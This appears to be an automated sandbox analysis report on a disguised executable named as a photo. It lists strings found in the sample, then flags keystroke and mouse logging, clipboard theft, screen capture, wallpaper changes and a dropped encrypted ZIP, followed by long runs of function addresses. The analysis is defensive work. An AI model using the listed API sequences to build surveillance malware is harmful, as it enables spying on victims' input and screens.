                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3256424262.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000003.3141274556.0000000010030000.00000004.00000020.00020000.00000000.sdmp, 8VhJ2Jq.exe, 00000004.00000002.3914567372.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/Timezone
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://zmconfig.duoyi.com/dyminiinstall.txt
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://zmconfig.duoyi.com/test/dyinstall_public.txt
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://zmconfig.duoyi.com/test/dyinstall_public_test.txt
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://zmconfig.duoyi.com/test/dyinstall_public_test.txthttps://zmconfig.duoyi.com/test/dyinstall_p
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://zmweb.duoyi.com/zm/protocol/list

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture and log keystrokes
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: [esc]4_2_03EC93F0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: [esc]4_2_03EC93F0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: [esc]4_2_03EC93F0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: [esc]4_2_03EC93F0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB6880 Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,4_2_03EB6880
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB6880 Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,4_2_03EB6880
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB71C6 _memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,4_2_03EB71C6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB6880 Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,4_2_03EB6880
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC6940 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,_memmove,DeleteObject,DeleteObject,ReleaseDC,_memmove,DeleteObject,DeleteObject,ReleaseDC,4_2_03EC6940
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC9090 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,4_2_03EC9090
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004129C4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_004129C4

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,4_2_6C3C8C7D
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C8C7D ReleaseMutex,WriteProfileStringA,WriteProfileStringA,WriteProfileStringA,SystemParametersInfoA,5_2_6C3C8C7D

                      System Summary

                      barindex
                      Drops password protected ZIP file
                      Source: t3d.tmp.0.drZip Entry: encrypted
                      Source: t3d.tmp.0.drZip Entry: encrypted
                      Source: t3d.tmp.0.drZip Entry: encrypted
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC6143 ExitWindowsEx,4_2_03EC6143
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC611F ExitWindowsEx,4_2_03EC611F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC60FB ExitWindowsEx,4_2_03EC60FB
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0043012D0_2_0043012D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0041E1E60_2_0041E1E6
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044C1900_2_0044C190
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004603400_2_00460340
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040638A0_2_0040638A
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040257A0_2_0040257A
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0041361E0_2_0041361E
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004227C20_2_004227C2
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040E8050_2_0040E805
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004669600_2_00466960
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_004049C50_2_004049C5
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040F9CE0_2_0040F9CE
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00455B400_2_00455B40
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00403B0D0_2_00403B0D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044FB200_2_0044FB20
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00407C070_2_00407C07
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0045DD800_2_0045DD80
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00403DB70_2_00403DB7
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0042CE650_2_0042CE65
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0040DE6D0_2_0040DE6D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00447FC00_2_00447FC0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00408F8D0_2_00408F8D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_024700310_2_02470031
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_024844D30_2_024844D3
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_024764A60_2_024764A6
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_024865B60_2_024865B6
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_02484A240_2_02484A24
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0247B9040_2_0247B904
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_02476E410_2_02476E41
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_02484F780_2_02484F78
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_1000839B0_2_1000839B
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_10005CA20_2_10005CA2
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_1000B9000_2_1000B900
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_10014A200_2_10014A20
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_100064A20_2_100064A2
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_100144CF0_2_100144CF
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_100165B20_2_100165B2
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_10006E3D0_2_10006E3D
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_10014F740_2_10014F74
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032E133F4_2_032E133F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032E1F6C4_2_032E1F6C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032DB77B4_2_032DB77B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032E2EA14_2_032E2EA1
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032E0DEE4_2_032E0DEE
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032D24B04_2_032D24B0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032E18904_2_032E1890
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB83E04_2_03EB83E0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB81504_2_03EB8150
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECEB964_2_03ECEB96
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ED9AD54_2_03ED9AD5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EDE2AC4_2_03EDE2AC
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EC39A04_2_03EC39A0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EDE7FD4_2_03EDE7FD
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECE7C44_2_03ECE7C4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECDF914_2_03ECDF91
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECEF7E4_2_03ECEF7E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EDED4E4_2_03EDED4E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EB25004_2_03EB2500
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECB4904_2_03ECB490
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EDF42A4_2_03EDF42A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03ECE4264_2_03ECE426
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03EE040C4_2_03EE040C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3958354_2_6C395835
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3511124_2_6C351112
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F1CD14_2_6C3F1CD1
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D9CC54_2_6C3D9CC5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C359CCA4_2_6C359CCA
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C36CD324_2_6C36CD32
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3E1D124_2_6C3E1D12
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3B9D7B4_2_6C3B9D7B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3CBD484_2_6C3CBD48
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3E6D464_2_6C3E6D46
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3ADD8F4_2_6C3ADD8F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3AEDF54_2_6C3AEDF5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C39BDD04_2_6C39BDD0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C9E124_2_6C3C9E12
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F8E6E4_2_6C3F8E6E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C358E604_2_6C358E60
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C3E4C4_2_6C3C3E4C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C36AED74_2_6C36AED7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C36DF3F4_2_6C36DF3F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3E7F374_2_6C3E7F37
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C36BFD74_2_6C36BFD7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C36387C4_2_6C36387C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F19334_2_6C3F1933
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3769734_2_6C376973
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D59904_2_6C3D5990
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3909DA4_2_6C3909DA
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D99C64_2_6C3D99C6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3DCAA54_2_6C3DCAA5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C365BBD4_2_6C365BBD
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C367BAA4_2_6C367BAA
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C35EBF44_2_6C35EBF4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C0BCC4_2_6C3C0BCC
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C35B41A4_2_6C35B41A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F149E4_2_6C3F149E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F248B4_2_6C3F248B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3EB5034_2_6C3EB503
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3645444_2_6C364544
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3805B34_2_6C3805B3
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C39B5D74_2_6C39B5D7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C86B74_2_6C3C86B7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C46984_2_6C3C4698
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3656984_2_6C365698
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3986894_2_6C398689
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3CF6C94_2_6C3CF6C9
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C39D7684_2_6C39D768
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D974B4_2_6C3D974B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3E67F54_2_6C3E67F5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C20254_2_6C3C2025
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C70034_2_6C3C7003
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3BB07C4_2_6C3BB07C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F20A34_2_6C3F20A3
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C37E0D84_2_6C37E0D8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3AA1924_2_6C3AA192
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C35E1C84_2_6C35E1C8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3582794_2_6C358279
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3D026A4_2_6C3D026A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3B32664_2_6C3B3266
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3682B24_2_6C3682B2
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3E62A64_2_6C3E62A6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3B62E84_2_6C3B62E8
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F42E14_2_6C3F42E1
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3BF32A4_2_6C3BF32A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3563744_2_6C356374
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3C83684_2_6C3C8368
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3BE35C4_2_6C3BE35C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3BC38C4_2_6C3BC38C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C38A3864_2_6C38A386
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_6C3F93C94_2_6C3F93C9
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_030407BB4_2_030407BB
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_0304125D4_2_0304125D
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03031E7D4_2_03031E7D
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03040D0C4_2_03040D0C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_0303B1484_2_0303B148
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_0304286E4_2_0304286E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03D7335F4_2_03D7335F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_03D67B0F4_2_03D67B0F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3958355_2_6C395835
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3511125_2_6C351112
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F1CD15_2_6C3F1CD1
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D9CC55_2_6C3D9CC5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C359CCA5_2_6C359CCA
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C36CD325_2_6C36CD32
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3E1D125_2_6C3E1D12
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3B9D7B5_2_6C3B9D7B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3CBD485_2_6C3CBD48
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3E6D465_2_6C3E6D46
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3ADD8F5_2_6C3ADD8F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3AEDF55_2_6C3AEDF5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C39BDD05_2_6C39BDD0
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C9E125_2_6C3C9E12
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F8E6E5_2_6C3F8E6E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C358E605_2_6C358E60
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C3E4C5_2_6C3C3E4C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C36AED75_2_6C36AED7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C36DF3F5_2_6C36DF3F
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3E7F375_2_6C3E7F37
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C36BFD75_2_6C36BFD7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C36387C5_2_6C36387C
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F19335_2_6C3F1933
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3769735_2_6C376973
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D59905_2_6C3D5990
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3909DA5_2_6C3909DA
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D99C65_2_6C3D99C6
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3DCAA55_2_6C3DCAA5
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C365BBD5_2_6C365BBD
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C367BAA5_2_6C367BAA
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C35EBF45_2_6C35EBF4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C0BCC5_2_6C3C0BCC
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C35B41A5_2_6C35B41A
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F149E5_2_6C3F149E
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3F248B5_2_6C3F248B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3EB5035_2_6C3EB503
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3645445_2_6C364544
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3805B35_2_6C3805B3
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C39B5D75_2_6C39B5D7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C86B75_2_6C3C86B7
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3C46985_2_6C3C4698
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3656985_2_6C365698
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3986895_2_6C398689
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3CF6C95_2_6C3CF6C9
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C39D7685_2_6C39D768
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3D974B5_2_6C3D974B
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 5_2_6C3E67F55_2_6C3E67F5
